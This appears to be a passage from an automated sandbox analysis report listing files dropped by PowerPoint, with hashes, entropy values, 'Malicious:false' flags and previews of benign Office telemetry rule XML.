                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):820
                                                                                                                              Entropy (8bit):4.826457377074059
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSJggikoCAvQierhferFMYD2EfW8/2EfMOHWIab/b8O2X/c//FpONkMNOjsu:2dODFHAvcr8rFf3rWbau
                                                                                                                              MD5:B7A35F02F75A093E0C7CB13EEBA957B0
                                                                                                                              SHA1:1C7DDF99971F1114486BEB22803E160D3E0B6422
                                                                                                                              SHA-256:A684E4135445F2FFD9424DAE62D11231BE8E1CA595A152923F076F00488086C0
                                                                                                                              SHA-512:A6D4C701F86C80921B259994B9D81742C78939F0096FC095D60EEB4C26F4348322E6334FC64E02EEE50775F66858FB10ED55BEC675D66F7A289E8E51B4820E12
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170011" V="2" DC="SM" EN="Office.Graphics.SmartArtIdleLayout" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="awjgf" />.. <UTS T="2" Id="asnax" />.. </S>.. <G>.. <S T="1">.. <F N="SmartArtGuid" />.. </S>.. <S T="2">.. <F N="SmartArtGuid" />.. </S>.. </G>.. <C T="G" I="0" O="true" N="SmartArtID">.. <S T="1" F="SmartArtGuid" M="Ignore" />.. </C>.. <C T="U32" I="1" O="true" N="Duration">.. <U T="100nsToMs">.. <O T="SUB">.. <L>.. <S T="2" F="TimeStamp100ns" M="Ignore" />.. </L>.. <R>.. <S T="1" F="TimeStamp100ns" M="Ignore" />.. </R>.. </O>.. </U>.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1352
                                                                                                                              Entropy (8bit):4.880790943619387
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dQsCHAvfr1uyqCZnr7sQCz6lINzKHOEW:ckgvfZuyHnXsQCz6lxW
                                                                                                                              MD5:BA1B2695827A778CBBA4EAB61845277A
                                                                                                                              SHA1:BDACAD9A2D3D0985130A776B6D18D662CD350C57
                                                                                                                              SHA-256:AAC1F207659EE57F264ABD3E2D5B3E123902041743CD02F23A8038C23FA7983C
                                                                                                                              SHA-512:0EE65B0F05C6F30FA9C07ADF39C0717FD584FE7970D421F3B1EA98CD62860A666754818074089EFCA7693AE5DFD20ECD527EF6FB1F31F06EC923EF57A748AAB6
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170012" V="12" DC="SM" EN="Office.Graphics.GVizInkStroke" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bgwr8" A="aqxmg" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="InkAction" />.. </L>.. <R>.. <V V="StylusUp" T="W" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="InputType">.. <S T="2" F="InputType" />.. </C>.. <C T="W" I="1" O="true" N="PenTip">.. <S T="2" F="PenTip" M="Ignore" />.. </C>.. <C T="B" I="2" O="true" N="IsDirectInk">.. <S T="2" F="IsDirectInk" M="Ignore" />.. </C>.. <C T="B" I="3" O="true" N="UsingTrackpadMode">.. <S T="2" F="UsingTrackpadMode" M="Ignore" />.. </C>.. <C T="B" I="4" O="true" N="IsAnimated">.. <S T="2" F="IsAnimated" M="Ignore" />.. </C>.. <C T="W" I="5" O="true" N="AnimationName">.. <S T="2" F="
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):378
                                                                                                                              Entropy (8bit):5.227853114045981
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7mvEkI2JMBBKMyxqb0c7oCDLChvRCUHperhLnPoURfI6vxxNOn2sby:TMHdSvyuwMkoCAvQierRhfI6ZxNO2su
                                                                                                                              MD5:A87BA7BCA6E326C4606C3E6B82B2AABE
                                                                                                                              SHA1:CE3BA5B4DBE1878B893F6107374F9D7CDA04A1DE
                                                                                                                              SHA-256:D119BB0514010439019F0F793A35455A1D86457971A529EC049F8CD2684F36F3
                                                                                                                              SHA-512:7D6672B37569407481BAD03983CBEE2FA90CDAB71BF0ABCC41505BFE2C9C2F839F40312A56C84B09965F28C89DF8EB4953B6089C953324C0FE903F2C9A88C492
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170013" V="1" DC="SM" EN="Office.Graphics.GVizSlideShowInkSavev1" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="axhji" />.. </S>.. <C T="B" I="0" O="false" N="InkSaved">.. <S T="1" F="InkSaved" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1373
                                                                                                                              Entropy (8bit):4.794620389997292
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dmt20OOO5HAv8huXGHsSt4BGHsm+/9RQ0q+kaqwYGqe:cUNKgv8huXIXt4BIk1RtYGb
                                                                                                                              MD5:EF514A20C4A80A191723BEB5508D250E
                                                                                                                              SHA1:A3272F3C187A22DF4EA142FC111E07FC4CA1B600
                                                                                                                              SHA-256:8C39093AAD28335C2FC61D4A6F1529BB048BBCE699772B617796C676DAAEB556
                                                                                                                              SHA-512:A9240AEB8B0D7E8B0BE5A45306936013EEEE6D6813584A1CDF363DE8316D65B00B929788DAA33CAF049D5F68388E4D1285F1D3B54D6F7AC893BBF649590C0C2F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170014" V="4" DC="SM" EN="Office.Graphics.GVizClipboardDataDeliveryStart" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" S="500" DCa="PSU" xmlns="">.. <S>.. <UCSS T="1" C="OART Clipboard" S="Monitorable Unexpected" />.. <F T="2">.. <O T="NE">.. <L>.. <S T="1" F="ULS_TagId" />.. </L>.. <R>.. <V V="aw1jo" T="W" />.. </R>.. </O>.. </F>.. <F T="3">.. <O T="EQ">.. <L>.. <S T="1" F="ULS_TagId" />.. </L>.. <R>.. <V V="aw1jo" T="W" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="ULS_TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="W" I="1" O="true" N="AdvertisedFormats">.. <S T="1" F="AdvertisedFormats" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="SelectedFormat">.. <S T="1" F="SelectedFormat" M="Ignore" />.. </C>.. <C T="W" I="3" O="true" N="Codepath"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1777
                                                                                                                              Entropy (8bit):4.294503887640287
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dMi4iHAvcrgvLJT6DqwONo6JIJAPuaTDquVDDSywoT1x7:cMYgvcMvLJT8qXodJgquVnfx7
                                                                                                                              MD5:F9E0C06685D3A6F2D481D56F482AF5D0
                                                                                                                              SHA1:DDCB3880925E49F06087900D9477F51C1DFD2E82
                                                                                                                              SHA-256:38A5A98F690F3C77AE1C6D5CFF2A6CFB40B4819BD07D59532CCF760CB1F1AB73
                                                                                                                              SHA-512:757B548522B91A3D7272740D53DCAD0C2CD732F4F44943A982AFA8AEB4C5B5A184B141BE16F0438081AEE9E23F6C3862961B1811B166146A2BCCBABC7176469A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170016" V="7" DC="SM" EN="Office.Graphics.GvizPictureLoadTelemetry" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="aqww0" />.. <A T="2" E="TelemetrySuspend" />.. <A T="3" E="TelemetryShutdown" />.. <F T="4">.. <O T="EQ">.. <L>.. <S T="1" F="Crop" />.. </L>.. <R>.. <V V="True" T="B" />.. </R>.. </O>.. </F>.. <F T="5">.. <O T="GT">.. <L>.. <S T="1" F="EffectsApplied" />.. </L>.. <R>.. <V V="0" T="U32" />.. </R>.. </O>.. </F>.. <F T="6">.. <O T="EQ">.. <L>.. <O T="COALESCE">.. <L>.. <S T="1" F="IsSVG" M="Ignore" />.. </L>.. <R>.. <V V="False" T="B" />.. </R>.. </O>.. </L>.. <R>.. <V V="True" T="B" />.. </
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1398
                                                                                                                              Entropy (8bit):4.951307118216317
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d3koHAv3r/PazmmQ13IdJLzcM7HhzORMOwizjNMbYzzmMTS:cUogv3V3I3
                                                                                                                              MD5:B29F2A89922CED2F133DDDE4C880C6F5
                                                                                                                              SHA1:BB4CE992E46AABCC87FB743A1B99F31D3983AA69
                                                                                                                              SHA-256:4EF1455906E4F29285B1B3FA6E7635820F2172B9133F633E5A24EE4BF9592B24
                                                                                                                              SHA-512:BF48CF7D87BEC0EA87A7DA1DCCA1E75ABD7D749079E06F90850C923DC9ADB897564B5898B8C353FEBCA405650BCCC02E1664A9F961FF0283B6A83213B2833011
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170019" V="1" DC="SM" EN="Office.Graphics.GVizARCDevice" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="DC" xmlns="">.. <S>.. <UTS T="1" Id="avx8c" />.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="U32" I="1" O="true" N="VendorId">.. <S T="1" F="VendorId" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="DeviceId">.. <S T="1" F="DeviceId" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="SubSysId">.. <S T="1" F="SubSysId" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="RevisionId">.. <S T="1" F="RevisionId" M="Ignore" />.. </C>.. <C T="W" I="5" O="true" N="Description">.. <S T="1" F="Description" M="Ignore" />.. </C>.. <C T="U32" I="6" O="true" N="DriverVersionMajor">.. <S T="1" F="DriverVersionMajor" M="Ignore" />.. </C>.. <C T="U32" I="7" O="true" N="DriverVersionMinor">.. <S T="1" F="DriverVe
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):601
                                                                                                                              Entropy (8bit):4.056172629241999
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSWZber3nf+u/qNOTfX/c//PpONd+tNqNOGX/c//uDpONQlVD4NOcsu:2d/UrXmuyQvKt4rTPG
                                                                                                                              MD5:DFA255B135958B7657384B76B081C465
                                                                                                                              SHA1:A1EE72E8BF0F50B24AE87C68693748B7FEDEF316
                                                                                                                              SHA-256:8D4EB4EAE918355407D938C8A083C5A7B320487CBC866C7AAF9FBF1E60B1EB1D
                                                                                                                              SHA-512:2FF77EB57D32FF3F54BEC9F14D71FCCF3620963D4135F987DB64141FF3719B59EFA618C05EE3F7367DE823D3FD65BF2383AB3FEA64AA02B0F39CF5AA63AB1282
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170021" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <UTS T="1" Id="aq4c0" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="Feature" />.. </L>.. <R>.. <V V="Slide" T="W" />.. </R>.. </O>.. </F>.. <F T="3">.. <O T="EQ">.. <L>.. <S T="2" F="Event" />.. </L>.. <R>.. <V V="Start" T="W" />.. </R>.. </O>.. </F>.. </S>.. <C T="FT" I="0" O="false">.. <S T="3" F="TimeStamp100ns" />.. </C>.. <T>.. <S T="3" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):755
                                                                                                                              Entropy (8bit):4.6580088883765125
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdS12ukoCAvQrer59XFJ5C/7PNWyNmu/vENP/k//zLMx2Nf/0//jLMhmMNOSjz:2d7RHAv7r5hvYTPP+KL6G
                                                                                                                              MD5:4A407E9411155665D936DB52E585D546
                                                                                                                              SHA1:B7ACFBA28DFACE650A7A7FE3F6522C7FA721A293
                                                                                                                              SHA-256:973F79916EBE464ABF6F7BD02D6273D19CA046D34878131E8016A0988BC94F82
                                                                                                                              SHA-512:D8DBCFEC631D08BC289F69A88E8C535D6609B3B99C5D0CC6BA0920227F5D4078046AE535CEE4D04F8FCA566715A43B2F240F9B3CF42CCC62EE1A959319BF4268
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170022" V="2" DC="SM" EN="Office.Graphics.GVisInkLoad" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" S="1" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="b8ipj" A="anui5" />.. <A T="2" E="TelemetryShutdown" />.. </S>.. <C T="B" I="0" O="false" N="ContainsInkStrokes">.. <O T="COALESCE">.. <L>.. <O T="EQ">.. <L>.. <U T="EqualsNull">.. <S T="1" F="TimeStamp100ns" />.. </U>.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </C>.. <T>.. <S T="1" />.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1978
                                                                                                                              Entropy (8bit):4.865007630199703
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dUPHAvcrEPA2r1u4lRW8x6AVd7ZNeMCnTAjAG81Eqjpw:cUPgvcKZlblcTAjAGmpw
                                                                                                                              MD5:918A9F7E16AE40CD90F2C6DA9B641772
                                                                                                                              SHA1:892FF60441721AE8CC7CF37B55A15FBFE82B6484
                                                                                                                              SHA-256:89F31306ECE3CEE3AACC0F35821BD3CDE05124E849B79D51B165B8E85C46D1CC
                                                                                                                              SHA-512:228C816074E3750275BD4EC97923AFC60BD39F642326CAF2C4C5BB8A7EB2E7B213858EE348BCBBAE0336F9659C4DDCD8D9641DCB3B3EA29433F4057AD252DE67
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170024" V="2" DC="SM" EN="Office.Graphics.GVisShapeLoadPassthrough" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a4xg1" />.. </S>.. <C T="FT" I="0" O="false" N="Time">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="W" I="1" O="true" N="Name">.. <S T="1" F="DrEl_TName" />.. </C>.. <C T="U32" I="2" O="true" N="Id">.. <S T="1" F="DrEl_Id" />.. </C>.. <C T="U32" I="3" O="false" N="Interval">.. <S T="1" F="Intv" />.. </C>.. <C T="U32" I="4" O="true" N="WidthEMU">.. <S T="1" F="DrEl_W" />.. </C>.. <C T="U32" I="5" O="true" N="HeightEMU">.. <S T="1" F="DrEl_H" />.. </C>.. <C T="W" I="6" O="true" N="Type">.. <S T="1" F="DrEl_Type" M="Ignore" />.. </C>.. <C T="B" I="7" O="true" N="Textbox">.. <S T="1" F="DrEl_Txtbox" M="Ignore" />.. </C>.. <C T="B" I="8" O="true" N="Line">.. <S T="1" F="Prop_Line" M="Ignore" />.. </C>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1397
                                                                                                                              Entropy (8bit):4.624076210416062
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dWgGi4iHAvcrl2rBMTTP5amwOaBzASJvfS60J:cPGYgvc8uTPPQBXJXCJ
                                                                                                                              MD5:96D3EA047045AA5FEA38C4C0E030CE7A
                                                                                                                              SHA1:BD5AE82B1814EFDAD48898E0CDBD3D7EAE972FC2
                                                                                                                              SHA-256:F4DB352A86A7BC1C671C47429711AA6F49185D08C1056BA2539BEB4CBE2876E7
                                                                                                                              SHA-512:F1801B591E9F9B965D99B46CC382954FB552B2EEA4140A3418DE0E50D79F69A75AFB3170A66C6108C8F537B15D3963368839FD030C53E630BB82BFFBA1B8BF80
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170026" V="0" DC="SM" EN="Office.Graphics.GvisIgxTextTelemetry" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a6mzy" />.. <UTS T="2" Id="axwza" />.. <SR T="3" R="Igx::">.. <S T="2" F="Cmd_Name" />.. </SR>.. <F T="4">.. <O T="EQ">.. <L>.. <S T="3" F="AlgorithmState" />.. </L>.. <R>.. <V V="End" T="W" />.. </R>.. </O>.. </F>.. <F T="5">.. <O T="EQ">.. <L>.. <S T="1" F="ULS_Category" />.. </L>.. <R>.. <V V="Scope Summary" T="W" />.. </R>.. </O>.. </F>.. <F T="6">.. <O T="EQ">.. <L>.. <S T="5" F="ScopeName" M="Ignore" />.. </L>.. <R>.. <V V="FileIO::CMsoOLDocBase::Close" T="W" />.. </R>.. </O>.. </F>.. </S>.. <G>.. <S T="4">.. <F N="Cmd_Name" />.. <F N
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):582
                                                                                                                              Entropy (8bit):5.144590977150849
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSCZ7koCAvQierBFVKI2dn+KufydytUdNO2su:2d+HAvcrgaa1T
                                                                                                                              MD5:6FED60969E2A0FF0B4031FA943C0B49F
                                                                                                                              SHA1:1A2F3EC4281336EB650F72A987B1464BB185A521
                                                                                                                              SHA-256:C175CB2A33151E4BDF6E74FE0E77B2FB539BA3377EE969B918A7F803AA1AE1B3
                                                                                                                              SHA-512:771A29361752C4DC773C9B275BFE0F5286BDF37A5EE2DA973DA731B2EABC75CC51CF94A4C8C654E5C608DDA74D79075017BCAE051C7A452AD6C439D3096DC7EB
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170027" V="0" DC="SM" EN="Office.Graphics.GvisIgxCPOpenCloseFrameWidgetXButton" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bbxeh" A="bb9a0 bb9a1" />.. </S>.. <C T="B" I="0" O="true" N="IsTouch">.. <S T="1" F="IsTouch" M="Ignore" />.. </C>.. <C T="B" I="1" O="true" N="CPState">.. <S T="1" F="CPState" M="Ignore" />.. </C>.. <C T="W" I="2" O="false" N="TagID">.. <S T="1" F="ULS_TagId" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):553
                                                                                                                              Entropy (8bit):4.969728038448219
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSKa8rkoCAvQieroereVv8X7PNWYuEf/0//OEhmMNOSjsu:2dmHAvcrPr48PoEPq
                                                                                                                              MD5:29493EFE9911810F5277E0143479C8A3
                                                                                                                              SHA1:45DCB80F9B49804218C03D3824AE9E44F4AB03BA
                                                                                                                              SHA-256:7C178B2E5EBC2C6E923F88770BBD4EC417414F7EED8D54998134DAD5B6CDA2F8
                                                                                                                              SHA-512:D3D7D2D45E77B5B1BAB284BC6DF258E8F437A2D0FC3D528AAA405B34F755CB1C55F69868195B0747ED092597D37208D9AD2CDA56CF46C3C9FC288739FE0A2820
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170030" V="1" DC="SM" EN="Office.Graphics.GFXLegacyInk" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bcze6" />.. <UTS T="2" Id="bdgkj" />.. </S>.. <C T="B" I="0" O="true" N="LegacyInk">.. <O T="COALESCE">.. <L>.. <S T="1" F="IsLegacy" M="Ignore" />.. </L>.. <R>.. <S T="2" F="IsLegacy" M="Ignore" />.. </R>.. </O>.. </C>.. <T>.. <S T="1" />.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):641
                                                                                                                              Entropy (8bit):4.903636660795986
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdS0rkoCAvQiernerXNQiBjF4LEXHaSM7qOXHhSMNOAdHNS7lu:2doHAvcrerXqoBaDr
                                                                                                                              MD5:AFBE46BFE61FCBC9C64CDF4896533183
                                                                                                                              SHA1:E365B923E0C2BD5487B7268511A6617F6359E9F3
                                                                                                                              SHA-256:6519A355273F56A057535CD379079D8A71E512A36C01ECA18E8F5AD5D37DD765
                                                                                                                              SHA-512:3CEF0C082B40902EFB3CCC116F60CA8EDB6A889E51C2D82C6520B0E1B420345252C98C7EC1C4C8B028144BBF9B939361FF22502CD024D133612571885B7343F3
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170032" V="2" DC="SM" EN="Office.Graphics.XErrors" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="aopfi" />.. <UTS T="2" Id="aopfj" />.. <A T="3" E="TelemetryShutdown" />.. <A T="4" E="TelemetrySuspend" />.. </S>.. <C T="U32" I="0" O="false" N="BlueXCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U32" I="1" O="false" N="RedXCount">.. <C>.. <S T="2" />.. </C>.. </C>.. <T>.. <S T="3" />.. <S T="4" />.. </T>.. <ST>.. <S T="1" />.. <S T="2" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):385
                                                                                                                              Entropy (8bit):5.136853677559959
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7mxkq4Yb0c7oCDLChvRCUHperhDpJrzVlrzwyXPfPSSMNOn2sby:TMHdSrCkoCAvQierpXzHtXHaSMNO2su
                                                                                                                              MD5:843452212CEDA1ADAC17AC275C9AA57E
                                                                                                                              SHA1:E0307E27FBC591B69EAB1AACFD74654D7B102998
                                                                                                                              SHA-256:F9526108AC0659CAF5261122FBAF9842865B04DFE1244B321C1AF55872F83223
                                                                                                                              SHA-512:627A47F370552A4640A19BCFE8F06097F6E17C439909B521AE42098861654442BF13CF93638157A69D2B309F9250D1FA832C6CD264C79A26001C9F96148ED523
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170033" V="0" DC="SM" EN="Office.Graphics.DirectInkCount" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bb5lm" />.. </S>.. <C T="U32" I="0" O="true" N="DirectInkCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):697
                                                                                                                              Entropy (8bit):5.019036184216836
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSB0tRnIkoCAvQierrgydvFRKcXFJzDaXOUdyXHaSMNO/HNUlu:2d3HAvcrrfLlvm/Ip7
                                                                                                                              MD5:842E7D9AEE17184674A20F467EE8BDE4
                                                                                                                              SHA1:ACF980F161E7FD65B6ADB5E5C1D41797FCD6C5C5
                                                                                                                              SHA-256:4787A42DE16791E087BAEC1841A92DF14F0C74CBDB2F425C6C0BBFE3F20DC322
                                                                                                                              SHA-512:63646FA0E4E2D38023D4A837DDC1EC92ACD60F55488767C4C5654DE129C929F581AD447442BF5BE839235FCBDBF90EA8F665BE4EE3FA8820B90C9BAEFE9DD3D5
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170034" V="1" DC="SM" EN="Office.Graphics.SmartArtCoauthoringConflictInfo" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bfo77" A="bfo78 bfo79 bfo8a bfo8b bfo8c bfo8d bfo8e bfo8f bfo8g bfo8h bfo8i bfo8j bfo8k" />.. <A T="2" E="TelemetryShutdown" />.. </S>.. <G>.. <S T="1">.. <F N="ULS_TagId" />.. </S>.. </G>.. <C T="W" I="0" O="false" N="TagID">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="false" N="TagCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="2" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):809
                                                                                                                              Entropy (8bit):4.856392286032534
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdS/xl6rkoCAvQierIiH+SXFJzDP4ydXtt/AGqdrNedynm/3ROXHaSMNO/HNUw:2dKrHAvcrfvXrttF6r0cmsp7
                                                                                                                              MD5:9DCED172BAF73EBF6C7CAAEFEC2F6D9C
                                                                                                                              SHA1:852CEA1CF8B916187472156D6BD0ABDE05A9F5B7
                                                                                                                              SHA-256:86AB0DBB90D8BD3108472E32219277A425301FA37EBC2C2F6D5BD842359168D4
                                                                                                                              SHA-512:6BE4408C8AF768250AD8D8DA61A65F800527362CAEBB5399CE0ACE744B93026DA9C96FEA165EBED0E6E66962167428970434D6CA99BF6ACC98F56D60C61A7B87
                                                                                                                              Malicious:false
